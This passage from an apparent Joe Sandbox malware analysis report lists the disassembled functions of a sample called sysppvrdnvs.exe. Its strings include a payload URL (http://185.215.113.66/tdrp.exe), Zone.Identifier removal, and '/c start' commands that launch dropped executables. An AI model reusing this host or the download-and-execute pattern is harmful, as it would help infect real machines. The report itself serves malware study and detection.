                                                                                                                                    • Opcode Fuzzy Hash: b9a17e562121240b50e18342ff29bb7a47b48788b8a8a72522e6dd27721dde94
                                                                                                                                    • Instruction Fuzzy Hash: 12313075900208FBCB04CF54D945B9A37B5BB44309F18857AE8096F381D37AEEA5DB8A
                                                                                                                                    Function 00405D30 Relevance: 1.3, APIs: 1, Instructions: 80COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(?,?,00000100,?,?,?,00000000), ref: 00405D8C
                                                                                                                                      • Part of subcall function 004076C0: memcpy.NTDLL(00000000,?,?), ref: 004076E8
                                                                                                                                      • Part of subcall function 004076C0: CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
                                                                                                                                      • Part of subcall function 004076C0: CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: memcpy$CloseCreateHandleThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 241592544-0
                                                                                                                                    • Opcode ID: d1a6c51456eb3f1f8bb8e6c6fdf63fe92b3fd94511b66a8fb5e91428111d4212
                                                                                                                                    • Instruction ID: 7caf050ee9b179aea45d58d53746834e47f0899ed77d0615408a0675d7b2b4ba
                                                                                                                                    • Opcode Fuzzy Hash: d1a6c51456eb3f1f8bb8e6c6fdf63fe92b3fd94511b66a8fb5e91428111d4212
                                                                                                                                    • Instruction Fuzzy Hash: 91318179A04208EFC704DF58D881BDA7BB5FF88304F0481B8E9489B396D635A981CB94
                                                                                                                                    Function 0040C6E0 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1475443563-0
                                                                                                                                    • Opcode ID: c06735b9bb3ca747746083835a1b84147725a79e97155fb761ee7c40afd9b0e2
                                                                                                                                    • Instruction ID: 6e1c982bf73a24a572eb662ea7eb90dd1456e91fb92d59b3ccb0b3fff8fbe84e
                                                                                                                                    • Opcode Fuzzy Hash: c06735b9bb3ca747746083835a1b84147725a79e97155fb761ee7c40afd9b0e2
                                                                                                                                    • Instruction Fuzzy Hash: 0A110874E00208EBDB00DBA1C881EAE77799F55304F04C27AED14A7381F639E606CB55
                                                                                                                                    Function 0040C780 Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4a2db90ea40cb3e4e99a624156167eaf50ef803cf4b6ed023375a7b27a719199
                                                                                                                                    • Instruction ID: 1b4390e4ee29ad65b8e359cbc1938e6215349f3d67b6f0ea2386614bd83c5173
                                                                                                                                    • Opcode Fuzzy Hash: 4a2db90ea40cb3e4e99a624156167eaf50ef803cf4b6ed023375a7b27a719199
                                                                                                                                    • Instruction Fuzzy Hash: D411A7B5D00109E7DB00DBA4DC81BAF77B45B14308F14867AFD44B72C1E67DD614975A

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 004068E0 Relevance: 107.2, APIs: 47, Strings: 14, Instructions: 407fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$C:\Windows\sysppvrdnvs.exe$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                    • API String ID: 495142193-2225385857
                                                                                                                                    • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                    • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                    • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                    Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                    • wsprintfW.USER32 ref: 004067C5
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                    • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                    • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                    • wsprintfW.USER32 ref: 0040683A
                                                                                                                                    • wsprintfW.USER32 ref: 0040685A
                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                    • API String ID: 92872011-445461498
                                                                                                                                    • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                    • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                    • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                    • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                    Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                    • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                                    • String ID: UKR
                                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                                    • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                    • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                    • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                    • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA
                                                                                                                                    Function 004064A0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 111networkfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                    • srand.MSVCRT ref: 004064B0
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                    • rand.MSVCRT ref: 004064D6
                                                                                                                                    • rand.MSVCRT ref: 004064EA
                                                                                                                                    • wsprintfW.USER32 ref: 0040650F
                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                    • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                    • wsprintfW.USER32 ref: 00406609
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                    Strings
                                                                                                                                    • %temp%, xrefs: 004064CB
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                    • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                    • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                    • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
                                                                                                                                    • API String ID: 2816847299-853099633
                                                                                                                                    • Opcode ID: db0eaae3e853224ad670cce8e70ecd23fd08653b657d015a3b33c3440649b795
                                                                                                                                    • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                    • Opcode Fuzzy Hash: db0eaae3e853224ad670cce8e70ecd23fd08653b657d015a3b33c3440649b795
                                                                                                                                    • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28
                                                                                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                    • Opcode ID: 5def7e071e7da6894acac3e8c9e4b3eb82f64dc1225d37b855f6bd456c2498ea
                                                                                                                                    • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                    • Opcode Fuzzy Hash: 5def7e071e7da6894acac3e8c9e4b3eb82f64dc1225d37b855f6bd456c2498ea
                                                                                                                                    • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99
                                                                                                                                    Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040EF98
                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                    • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                    • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                    • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                    • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                    • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54
                                                                                                                                    Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                                    • Opcode ID: 3405ee1fcabb9421b3ec30595840ce6cebe584c34456a6c61e452a9706b0566e
                                                                                                                                    • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                    • Opcode Fuzzy Hash: 3405ee1fcabb9421b3ec30595840ce6cebe584c34456a6c61e452a9706b0566e
                                                                                                                                    • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98
                                                                                                                                    Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040E668
                                                                                                                                    • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                    • String ID: <$GET
                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                    • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                    • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                    • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                    • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
                                                                                                                                    Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                    • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                    • wsprintfW.USER32 ref: 004066C4
                                                                                                                                    • wsprintfW.USER32 ref: 004066E5
                                                                                                                                    Strings
                                                                                                                                    • cl@, xrefs: 004066A0
                                                                                                                                    • %comspec%, xrefs: 004066EE
                                                                                                                                    • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                    • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                    • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                    • API String ID: 1147330536-497122036
                                                                                                                                    • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                    • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                    • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                    • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                      • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
